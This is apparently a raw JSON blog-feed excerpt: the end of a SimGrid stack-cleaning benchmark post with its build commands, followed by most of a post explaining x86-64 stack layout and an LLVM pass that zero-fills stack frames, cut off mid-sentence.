TestNormalStack cleaning
ctest (complete testsuite)348.06s372.95s
ctest -R mc-bugged1-liveness-visited-ucontext-sparse1.53s1.53s
run_test comm dup 442.54s36.68s
\n

Appendix: reproducibility

\n

Those results were generated with:

\n
MAKEFLAGS=\"-j$(nproc)\"\n\ngit clone https://gforge.inria.fr/git/simgrid/simgrid.git\ngit checkout cd84ed2b393b564f5d8bfdaae60b814f81f24dc4\ncd simgrid\nsimgrid=\"$(pwd)\"\n\nmkdir build-normal\ncd build-normal\ncmake .. -Denable_model-checking=ON -Denable_documentation=OFF \\\n  -Denable_compile_warnings=ON -Denable_smpi_MPICH3_testsuite=ON\nmake $MAKEFLAGS\ncd ..\n\nmkdir build-zero\ncd build-zero\ncmake .. -Denable_model-checking=ON -Denable_documentation=OFF \\\n  -Denable_compile_warnings=ON -Denable_smpi_MPICH3_testsuite=ON \\\n  -DCMAKE_C_COMPILER=\"$simgrid/tools/stack-cleaner/cc\" \\\n  -DCMAKE_CXX_COMPILER=\"$simgrid/tools/stack-cleaner/c++\" \\\n  -DGFORTRAN_EXE=\"$simgrid/tools/stack-cleaner/fortran\"\nmake $MAKEFLAGS\ncd ..\n\nrun_test() {\n  (\n  platform=$(find $simgrid -name small_platform_with_routers.xml)\n  hostfile=$(find $simgrid | grep mpich3-test/hostfile$)\n\n  local base\n  base=$(pwd)\n  cd $base/teshsuite/smpi/mpich3-test/$1/\n\n  $base/bin/smpirun -hostfile $hostfile -platform $platform \\\n    --cfg=maxmin/precision:1e-9 --cfg=network/model:SMPI \\\n    --cfg=network/TCP_gamma:4194304 \\\n    -np $3 --cfg=model-check:1 \\\n    --cfg=smpi/send_is_detached_thres:0 --cfg=smpi/coll_selector:mpich \\\n    --cfg=contexts/factory:ucontext --cfg=model-check/max_depth:100000 \\\n    --cfg=model-check/reduction:none --cfg=model-check/visited:100000 \\\n    --cfg=contexts/stack_size:4 --cfg=model-check/sparse-checkpoint:yes \\\n    --cfg=model-check/soft-dirty:no ./$2 > /dev/null\n  )\n}\n
\n\n\n

The results without the optimisation are obtained by removing the\nrelevant assembly from the clean-stack-filter script.

"}, {"id": "http://www.gabriel.urdhr.fr/2014/10/06/cleaning-the-stack-in-a-llvm-pass/", "title": "Cleaning the stack in a LLVM pass", "url": "https://www.gabriel.urdhr.fr/2014/10/06/cleaning-the-stack-in-a-llvm-pass/", "date_published": "2014-10-06T00:00:00+02:00", "date_modified": "2014-10-06T00:00:00+02:00", "tags": ["computer", "simgrid", "llvm", "compilation", "assembly", "x86_64"], "content_html": "

In the previous episode, we implemented a LLVM pass which does\nnothing. Now we are trying to modify\nthis to create a (proof-of-concept) LLVM pass which fills the current\nstack frame with zero before using it.

\n

Structure of the x86-64 stack

\n

Basic structure

\n

The top (in fact the bottom) of the stack is stored in the %rsp\nregister: a push operation decrements the value of %rsp and store\nthe value in the resulting address; conversely a pop operation\nincrements the value of %rsp. Stack variables are allocated by\ndecrementing %rsp.

\n

A function call (call) pushes the current value of the instruction\n(%rip) pointer on the stack. A return instruction (ret) pops a\nvalue from the stack into %rip.

\n

A typical call frame contains in order:

\n\n
\n
    \n
  1. parameter for f()
  2. \n
  3. parameter for f()
  4. \n
  5. return address to caller of f()
  6. \n
  7. local variable for f()
  8. \n
  9. local variable for f()
  10. \n\n
  11. parameter for g()
  12. \n
  13. parameter for g()
  14. \n
  15. return address to f() caller of g()
  16. \n
  17. local variable for g()
  18. \n
  19. local variable for g() \u2190 %rsp
  20. \n
  21. \n
  22. \n
\n
x86-64 stack structure for f()\n calls g()
\n
\n\n

For example this C code,

\n
int f();\n\nint main(int argc, char** argv) {\n  int i = 42;\n  f();\n  return 0;\n}\n
\n\n\n

is compiled (with clang -S -fomit-frame-poiner example.c) into this\n(using AT&T\nsyntax):

\n
main:\n    subq    $24, %rsp\n    movl    $0, 20(%rsp)\n    movl    %edi, 16(%rsp)\n    movq    %rsi, 8(%rsp)\n    movl    $42, 4(%rsp)\n    movb    $0, %al\n    callq   f\n    movl    $0, %edi\n    movl    %eax, (%rsp)\n    movl    %edi, %eax\n    addq    $24, %rsp\n    ret\n
\n\n\n

Memory is allocated on the stack using subq. Local variables are\nusually referenced by offsets from the stack pointer, OFFSET(%rsp).

\n

Frame pointer

\n

The x86 (32 bit) ABI uses the %rbp as the base of the stack. This is\nnot mandatory in the x86-64\nABI but the\ncompiler might still use a frame pointer. The base of the stack frame\nin stored in %rbp.

\n
\n
    \n
  1. parameter for f()
  2. \n
  3. parameter for f()
  4. \n
  5. return address to caller of f()
  6. \n
  7. saved %rbp from caller of f() \u2190 saved %rbp
  8. \n
  9. local variable for f()
  10. \n
  11. local variable for f()
  12. \n\n
  13. parameter for g()
  14. \n
  15. parameter for g()
  16. \n
  17. return address to f() caller of g()
  18. \n
  19. saved %rbp from f() \u2190 %rbp
  20. \n
  21. local variable for g()
  22. \n
  23. local variable for g() \u2190 %rsp
  24. \n
  25. \n
  26. \n
\n
x86-64 stack structure for f()\n calls g() with frame pointer
\n
\n\n

Here is the same program compiled with -fno-omit-frame-pointer:

\n
main:\n    pushq   %rbp\n    movq    %rsp, %rbp\n    subq    $32, %rsp\n    movl    $0, -4(%rbp)\n    movl    %edi, -8(%rbp)\n    movq    %rsi, -16(%rbp)\n    movl    $42, -20(%rbp)\n    movb    $0, %al\n    callq   f\n    movl    $0, %edi\n    movl    %eax, -24(%rbp)\n    movl    %edi, %eax\n    addq    $32, %rsp\n    popq    %rbp\n    ret\n
\n\n\n

When a frame pointer is used, stack memory is usually referenced as\nfixed offset from %rsp: OFFSET(%rsp).

\n

Red zone

\n

The x86 32-bit ABI did not allow the code of the function to use\nvariables after the top of the stack: a signal handler could at any\nmoment use any memory after the top of the stack.

\n

The standard x86-64\nABI allows the\ncode of the current function to use the 128 bytes (the red zone) after\nthe top the stack. A signal handler must be instantiated by the OS\nafter the red zone. The red zone can be used for temporary variables\nor for local variables for leaf functions (functions which do not call\nother functions).

\n
\n
    \n
  1. parameter for f()
  2. \n
  3. parameter for f()
  4. \n
  5. return address to caller of f()
  6. \n
  7. local variable for f()
  8. \n
  9. local variable for f()
  10. \n\n
  11. parameter for g()
  12. \n
  13. parameter for g()
  14. \n
  15. return address to f() caller of g()
  16. \n
  17. local variable for g()
  18. \n
  19. local variable for g() \u2190 %rsp
  20. \n\n
  21. red zone
  22. \n
  23. \u2026
  24. \n
  25. red zone
  26. \n\n
  27. \n
  28. \n
\n
x86-64 stack structure for f()\n calls g() (with the red zone)
\n
\n\n

Note: Windows systems do not use the standard x86-64 ABI: the\nusage of the register is different and there is no red zone.

\n

Let's make main() a leaf function:

\n
int main(int argc, char** argv) {\n  int i = 42;\n  return 0;\n}\n
\n\n\n

The variables are allocated in the red zone (negative offsets from the\nstack pointer):

\n
main:\n        movl    $0, %eax\n        movl    $0, -4(%rsp)\n        movl    %edi, -8(%rsp)\n        movq    %rsi, -16(%rsp)\n        movl    $42, -20(%rsp)\n        ret\n
\n\n\n

Cleaning the stack

\n

Assembly

\n

Here is the code we are going to add at the beginning of each\nfunction:

\n
    movq $QSIZE, %r11\n.Lloop:\n        movq $0, OFFSET(%rsp,%r11,8)\n        subq $1, %r11\n        jne  .Lloop\n
\n\n\n

for some suitable values of QSIZE and OFFSET.

\n

The %r11 is defined by the System V x86-64 ABI (as well as the\nWindows ABI) as a scratchpad register: at the beginning of the\nfunction we are free to use it without saving it first.

\n

LLVM pass

\n

This is implemented by a StackCleaner machine pass whose\nrunOnMachineFunction() works similarly to the NopInserter pass.

\n

Parameter computation

\n

We compute the parameters of the generate native code from the size of\nthe stack frame:

\n\n
int</